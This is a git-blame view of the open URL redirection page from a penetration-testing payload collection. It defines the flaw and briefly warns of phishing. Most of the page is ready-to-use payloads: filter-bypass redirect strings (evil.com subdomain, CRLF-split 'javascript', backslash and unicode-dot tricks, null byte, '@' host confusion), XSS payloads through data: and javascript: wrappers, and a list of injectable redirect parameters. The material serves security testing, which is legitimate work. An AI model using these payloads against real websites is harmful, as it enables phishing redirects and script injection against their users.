1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-28 01:36:06 +02:00
PayloadsAllTheThings/Open redirect/README.md

133 lines
3.5 KiB
Markdown
Raw Normal View History

2016-10-18 10:41:18 +02:00
# Open URL Redirection
2018-08-12 23:30:22 +02:00
> Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the applications access control check and then forward the attacker to privileged functions that they would normally not be able to access.
2016-10-18 10:01:56 +02:00
2017-07-06 21:02:19 +02:00
## Fuzzing
2018-08-12 23:30:22 +02:00
2017-07-06 21:02:19 +02:00
Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL.
2018-08-12 23:30:22 +02:00
```powershell
2017-07-06 21:02:19 +02:00
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
```
## Exploitation
2018-08-12 23:30:22 +02:00
Using a whitelisted domain or keyword
2018-08-12 23:30:22 +02:00
```powershell
www.whitelisted.com.evil.com redirect to evil.com
```
2016-10-18 10:01:56 +02:00
2016-10-18 10:41:18 +02:00
Using CRLF to bypass "javascript" blacklisted keyword
2018-08-12 23:30:22 +02:00
```powershell
2016-10-18 10:41:18 +02:00
java%0d%0ascript%0d%0a:alert(0)
2016-10-18 10:01:56 +02:00
```
2016-10-18 10:41:18 +02:00
Using "//" to bypass "http" blacklisted keyword
2018-08-12 23:30:22 +02:00
```powershell
2016-10-18 10:41:18 +02:00
//google.com
```
Using "https:" to bypass "//" blacklisted keyword
2018-08-12 23:30:22 +02:00
```powershell
2016-10-18 10:41:18 +02:00
https:google.com
```
Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
2018-08-12 23:30:22 +02:00
```powershell
2016-10-18 10:41:18 +02:00
\/\/google.com/
2017-07-06 21:02:19 +02:00
/\/google.com/
2016-10-18 10:41:18 +02:00
```
Using "%E3%80%82" to bypass "." blacklisted character
2018-08-12 23:30:22 +02:00
```powershell
2016-10-18 10:41:18 +02:00
//google%E3%80%82com
```
Using null byte "%00" to bypass blacklist filter
2018-08-12 23:30:22 +02:00
```powershell
2016-10-18 10:41:18 +02:00
//google%00.com
```
Using parameter pollution
```powershell
?next=whitelisted.com&next=google.com
```
2016-10-18 10:41:18 +02:00
Using "@" character, browser will redirect to anything after the "@"
2018-08-12 23:30:22 +02:00
```powershell
2016-10-18 10:41:18 +02:00
http://www.theirsite.com@yoursite.com/
```
Creating folder as their domain
2018-08-12 23:30:22 +02:00
```powershell
2016-10-18 10:41:18 +02:00
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
```
XSS from Open URL - If it's in a JS variable
2018-08-12 23:30:22 +02:00
```powershell
2016-10-18 10:41:18 +02:00
";alert(0);//
```
XSS from data:// wrapper
2018-08-12 23:30:22 +02:00
```powershell
2016-10-18 10:41:18 +02:00
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
```
XSS from javascript:// wrapper
2018-08-12 23:30:22 +02:00
```powershell
2016-10-18 10:41:18 +02:00
http://www.example.com/redirect.php?url=javascript:prompt(1)
```
## Common injection parameters
```powershell
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
```
2016-10-18 10:01:56 +02:00
## Thanks to
2018-08-12 23:30:22 +02:00
2016-10-18 10:41:18 +02:00
* filedescriptor
2018-08-12 23:30:22 +02:00
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
2017-07-06 21:02:19 +02:00
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)